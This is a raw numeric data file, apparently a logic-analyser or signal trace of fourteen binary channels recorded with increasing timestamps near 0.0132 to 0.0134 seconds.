0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3197752e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3197780e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3197804e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3197828e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3197852e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3197876e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3197900e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3197928e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3197952e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3197976e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3198004e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3198028e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3198052e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3198076e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3198100e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3198124e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3198152e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3198176e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3198204e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3198228e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3198252e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3198276e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3198300e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3198328e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3198352e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3198380e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3198404e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3198428e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3198452e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3198476e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3198500e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3198528e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3198552e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3198576e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3198604e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3198628e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3198652e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3198676e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3198700e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3198724e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3198752e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3198780e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3198804e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3198828e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3198852e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3198876e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3198900e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3198924e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3198948e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3198956e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,1,1.3322780e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,1.3323012e-02 1,0,1,0,1,1,0,0,0,1,0,1,0,1,1.3323036e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,1.3323060e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,1,1.3323404e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,1.3323428e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,1,1.3323452e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,1.3323476e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,1,1.3323500e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,1.3323524e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,1,1.3323548e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,1.3323572e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,1,1.3323600e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3323612e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3323624e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3323652e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3323676e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3323684e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3323700e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3323724e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3323748e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3323772e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3323780e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3323800e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3323824e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3323852e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3323876e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3323900e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3323924e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3323948e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3323972e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3324000e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3324024e-02 1,0,1,0,1,1,0,0,0,0,0,0,0,0,1.3324028e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3324032e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3324052e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3324076e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3324100e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3324124e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3324132e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3324148e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3324172e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3324200e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3324224e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3324252e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3324276e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3324300e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3324324e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3324332e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3324348e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3324372e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3324400e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3324424e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3324428e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3324452e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3324476e-02 1,0,1,0,1,1,0,0,0,0,0,0,0,0,1.3324480e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3324484e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3324500e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3324524e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3324548e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3324572e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3324600e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3324624e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3324652e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3324676e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3324680e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3324700e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3324724e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3324732e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3324748e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3324772e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3324800e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3324828e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3324852e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3324876e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3324880e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3324900e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3324924e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3324948e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3324972e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3324996e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3325020e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3325028e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3325048e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3325072e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3325100e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3325124e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3325148e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3325172e-02 1,0,1,0,1,0,0,0,0,1,0,0,0,0,1.3325176e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3325180e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3325196e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3325220e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3325248e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3325272e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3325300e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3325324e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3325348e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3325372e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3325380e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3325396e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3325420e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3325448e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3325472e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3325476e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3325500e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3325524e-02 1,0,1,0,1,1,0,0,0,0,0,0,0,0,1.3325528e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3325532e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3325548e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3325572e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3325596e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3325620e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3325648e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3325672e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3325700e-02 1,0,1,0,1,0,0,0,0,1,0,0,0,0,1.3325724e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3325728e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3325748e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3325772e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3325780e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3325796e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3325820e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3325876e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3325900e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3325948e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3325972e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3326020e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3326048e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3326100e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3326124e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3326172e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3326196e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3326248e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3326272e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3326300e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3326324e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3326348e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3326372e-02 1,0,1,0,1,0,0,0,0,1,0,0,0,0,1.3326376e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3326380e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3326396e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3326420e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3326448e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3326472e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3326500e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3326524e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3326548e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3326572e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3326596e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3326620e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3326628e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3326648e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3326672e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3326700e-02 1,0,1,0,1,0,0,0,0,1,0,0,0,0,1.3326724e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3326728e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3326748e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3326772e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3326796e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3326820e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3326848e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3326872e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3326900e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3326924e-02 1,0,1,0,1,1,0,0,0,0,0,0,0,0,1.3326928e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3326932e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3326948e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3326972e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3326996e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3327020e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3327048e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3327072e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3327100e-02 1,0,1,0,1,0,0,0,0,1,0,0,0,0,1.3327124e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3327128e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3327148e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3327172e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3327196e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3327224e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3327248e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3327272e-02 1,0,1,0,1,1,0,0,0,0,0,0,0,0,1.3327276e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3327280e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3327300e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3327324e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3327348e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3327372e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3327428e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3327448e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3327500e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3327524e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3327572e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3327596e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3327648e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3327672e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3327724e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3327748e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3327796e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3327820e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3327848e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3327872e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3327900e-02 1,0,1,0,1,0,0,0,0,1,0,0,0,0,1.3327924e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3327928e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3327948e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3327972e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3327996e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3328020e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3328048e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3328072e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3328100e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3328124e-02 1,0,1,0,1,1,0,0,0,0,0,0,0,0,1.3328128e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3328132e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3328148e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3328172e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3328196e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3328220e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3328248e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3328272e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3328276e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3328300e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3328324e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3328348e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3328380e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3328404e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3328432e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3328460e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3328484e-02 1,0,1,0,1,1,0,0,0,0,0,0,0,0,1.3328488e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3328492e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3328508e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3328532e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3328556e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3328580e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3328636e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3328660e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3328708e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3328732e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3328780e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3328808e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3328860e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3328884e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3328932e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3328956e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3329008e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3329032e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3329060e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3329080e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3329108e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3329132e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3329156e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3329180e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3329208e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3329232e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3329260e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3329280e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3329308e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3329332e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3329356e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3329380e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3329408e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3329432e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3329460e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3329484e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3329508e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3329532e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3329556e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3329580e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3329608e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3329632e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3329660e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3329684e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3329708e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3329732e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3329756e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3329780e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3329808e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3329832e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3329860e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3329884e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3329908e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3329932e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3329956e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3329980e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3330008e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3330032e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3330060e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3330084e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3330108e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3330132e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3330156e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3330180e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3330208e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3330232e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,1,1.3454684e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,1,1.3454900e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,1.3454924e-02 0,1,1,0,1,0,0,0,0,0,0,1,0,1,1.3454948e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,1.3454972e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,1,1.3455316e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,1.3455340e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,1,1.3455364e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,1.3455388e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,1,1.3455408e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,1.3455432e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,1,1.3455460e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,1.3455484e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,1,1.3455508e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,1.3455532e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,1,1.3455556e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3455580e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3455608e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3455632e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3455660e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3455684e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3455708e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3455732e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3455756e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3455780e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3455808e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3455832e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3455860e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3455884e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3455908e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3455932e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3455956e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3455980e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3456008e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3456032e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3456060e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3456084e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3456108e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3456132e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3456156e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3456180e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3456208e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3456232e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3456260e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3456284e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3456308e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3456332e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3456356e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3456380e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3456408e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3456432e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3456460e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3456484e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3456508e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3456532e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3456556e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3456580e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3456608e-02 